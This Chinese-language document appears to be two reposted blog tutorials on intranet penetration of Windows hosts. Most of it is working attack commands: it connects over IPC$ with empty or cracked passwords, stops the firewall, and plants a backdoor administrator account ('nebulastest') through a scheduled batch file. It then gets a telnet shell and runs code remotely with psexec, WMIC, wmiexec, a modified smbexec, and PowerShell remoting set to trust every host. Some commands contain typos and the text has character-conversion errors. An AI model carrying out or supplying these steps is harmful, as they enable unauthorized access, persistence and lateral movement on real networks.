内网渗透之IPC，远程执行

开启服务

net start Schedule

net start wmiApSrv

关闭防火墙

net stop sharedaccess

net use \\目标IP\ipc$ "" /user:"administrator"进行链接

 

net use \\目标IP\ipc$

 

试环境：主机（windows XP sp3）与windows XP sp2虚拟机)
   经过IPC$与windowsXP创建链接，在如今的绝大多数的XP操做系统中老是会出现问题。如下如何解决在创建IPC$出现的一系列问题。IPC$(Internet process connection),一般不少的机子的默认共享都是打开的！在cmd下使用net share命令是否是发现有不少$，"ipc$ admin$ ，c$ ，d$....."（很危险啊）。
如今进入正题：

1.net use \\目标IP\ipc$



出现53错误：找不到网络路径，（目标主机打开了系统防火墙或者其余防火墙软件，解决：关闭目标防火墙）
出现1326错误：

1）net use \\目标IP\ipc$ "" /user:"administrator"进行链接，报告系统发生1326错误，登录失败：未知用户名或密码错误。检查一下咱们的命令是否错误或者用户名错误。结果发现无错。

2）在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,而后再尝试链接。简单文件共享会
把网络链接权限都归为 guest链接，是没法访问IPC$等管理共享的.结果发现这个错误，纠正。

紧接着可能出现1327错误：登录失败：用户账户限制。可能的缘由包括不容许空密码，登录时间限制，或强制的策略限。"在远程机的"控制面板－管理工具－本地安全策略－安全选项－用户权限"指派里，禁用"空密码用户只能进行控制台登录".



映射对方默认共享c盘：net use z: \\目标IP\c$



在个人电脑中会出现网络驱动器



创建ipc$告一段落，删除ipc$链接：net sue \\目标IP\ipc$ /del

在此基础上在目标电脑上留下后门帐号：
编写一个批处理文件，并拷贝到对方的电脑上，而后增长计划任务执行批处理文件；
批处理命令：（保存为adduser.bat）
net user nebulastest 123456 /add //增长用户nebulastest，密码123456
net localgroup administrators nebulastest /add //为用户nebulastest赋予管理员权限

而后在本机上执行命令（已经创建IPC$链接）：copy adduser.bat \\目标IP\c$
接着查看目标电脑时间:net time \\目标IP
随后为目标电脑增长计划任务：at \\目标IP 执行时间 c:\adduser.bat



删除当前IPC$连接，使用新用户和新密码创建IPC$连接，以测试时候创建帐号成功。
net use \\目标IP\ipc$ "123456" /user:"nebulastest"




使用telnet进行登录：（前提:目标电脑已经开启telnet服务）

双击"telnet服务"-----选择"自动"-----点击"启动"



在命令行输入：telnet 目标IP
以后弹出远程登陆对话框,选择Y,输入用户名（后门帐户，密码）
输入密码不会如今可是回车后会自动验证是否密码正确



下图已经输入密码可是不会显示：



登录后的界面：



大功告成，得到目标主机shell

 

 

在远程系统上执行程序的技术整理

三好学生 · 2015/07/24 17:41

0x00 前言

上一篇学习了如何导出域内全部用户hash，那么，接下来准备用破解出的用户名口令尝试远程登录目标主机并执行程序，结合实际环境作了以下测试.

0x01 目标

远程登录目标主机执行测试程序

0x02 测试环境

远程主机：

ip：192.168.40.137

用户名：test

口令：testtest

操做系统：win7 x64

远程登录方式：

net use远程登录，不使用3389

Tips：

解决工做组环境没法远程登录执行程序的方法：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System add a new DWORD (32-bit) called "LocalAccountTokenFilterPolicy" and set it to 1

0x03 测试方法

1、at&schtasks

计划任务方式执行程序。

条件：

启动Task Scheduler服务

2、psexec

PsTools工具之一，在指定的一台或多台计算机上运行应用程序

条件：

须要开放ADMIN$共享

3、WMIC

功能强大，可作系统管理、远程主机信息获取

条件：

启动WMI服务，开放135端口

本地安全策略的"网络访问: 本地账户的共享和安全模式"应设为"经典-本地用户以本身的身份验证"

4、wmiexec

使用VBS脚本调用WMI来模拟psexec的功能，基本上psexec能用的地方，这个脚本也可以使用。

条件：

启动WMI服务，开放135端口

本地安全策略的"网络访问: 本地账户的共享和安全模式"应设为"经典-本地用户以本身的身份验证"

0x04 实际测试

使用用户名口令远程登录192.168.40.137，如图1

查看目标主机共享资源，如图1-2

1、at&schtasks

at \\192.168.40.137

找不到网络路径，判断是目标主机已禁用Task Scheduler服务

如图2

2、psexec

PsExec.exe \\192.168.40.137 /accepteula -u test -p testtest -c c:\runtest\calc.exe

找不到网络名，判断目标主机已禁用ADMIN$共享

如图3

3、WMIC

wmic /node:192.168.40.137 /user:test /password:testtest process call create calc.exe

Description = 没法启动服务，缘由多是已被禁用或与其相关联的设备没有启动，判断WMI服务被禁用

如图4

4、wmiexec

cscript.exe wmiexec.vbs /cmd 192.168.40.137 test testtest "ipconfig"

WMIEXEC ERROR: 没法启动服务，缘由多是已被禁用或与其相关联的设备没有启动，判断WMI服务被禁用

如图5

0x05 分析

整理下目前掌握的目标主机信息：

目标主机:

1、已得到登录用户名及口令

2、能够net use链接

3、开放共享C

可是：

1、默认admin$共享关闭，没法使用psexec

2、Task scheduler关闭，没法使用at、schtasks

3、Windows Management Instrumentation服务关闭,关闭135端口没法使用wmic、wmiexec

4、不支持3389

那么，如何在目标主机远程执行程序？

猜想管理员应该是对经常使用的远程执行程序的方法作了限制，就在束手无策的时候忽然想到了smbexec，它是基于psexec，若是目标主机开放了其余默认共享，却是能够尝试smbexec

因而搜索smbexec，终于在GitHub上面找到了一个smbexec的c++参考资料，做为工具改进模版

模版下载地址：

https://github.com/sunorr/smbexec

0x06 改进方案

模版中的bug不细讲，最终我成功用vc6实现了psexec的功能，同时也作了一些改进：

1、可指定默认共享名

为了完成上述测试，加入了参数来指定默认共享，若是ADMIN$共享关闭，那么能够尝试其余磁盘的默认共享

2、分离安装服务的功能

在实际测试过程当中，若是ADMIN$共享关闭，c$共享开启，由于UAC的缘故，注册安装服务的功能会出现bug，采起的解决办法为将实现注册安装服务功能的exe单独上传至c:\windows下， 便可解决权限不够的问题

0x07 方案测试

1、工具说明

文件说明：

test.exe:主程序

execserver.exe：实现注册安装服务的辅助程序

参数说明：

test.exe ip user password command netshare

eg:

test.exe 192.168.40.137 test testtest whoami c$

2、使用流程

（1）上传execserver.exe至c:\windows

copy execserver.exe \\192.168.40.137\c$\windows

（2）远程执行

test.exe 192.168.40.137 test testtest whoami c$

如图6

最终咱们经过改造的smbexec，突破目标主机限制，成功远程执行程序。

程序源码下载连接：

smbexec_source.zip

0x08 补充

1、powershell remoting

实如今目标主机远程执行程序后，可对目标主机开放powershell remoting，用做远程链接

条件：

远程链接会有痕迹

本机要开启winRM服务

命令汇总：

列出全部远程信任主机

powershell Get-Item WSMan:\localhost\Client\TrustedHosts

设置信任全部主机

powershell Set-Item WSMan:\localhost\Client\TrustedHosts -Value * -Force

设置容许运行ps1文件

powershell Set-ExecutionPolicy Unrestricted

执行test.ps1文件

powershell -ExecutionPolicy Bypass -File test.ps1

ps1文件以下：

$UserName = "test"

$serverpass = "testtest" $Password = ConvertTo-SecureString $serverpass -AsPlainText –Force $cred = New-Object System.Management.Automation.PSCredential($UserName,$Password)

invoke-command -ComputerName 192.168.40.137 -Credential $cred -ScriptBlock { ipconfig }

2、python smbexec

随后用python写的smbexec也实现了相同的功能，但py2exe的时候遇到了大麻烦，若是有更简单的方法， 但愿能获得你的帮助。

0x09 小结

这篇文章共列举了六种远程执行程序的方法，若是已经成功登录目标主机，却没法执行程序，最心塞的事情莫过于此。

at

psexec

WMIC

wmiexec

smbexec

powershell remoting

...

得到用户名口令，实现远程执行程序仅仅是个开始，内网渗透会颇有趣。

水平有限，欢迎补充。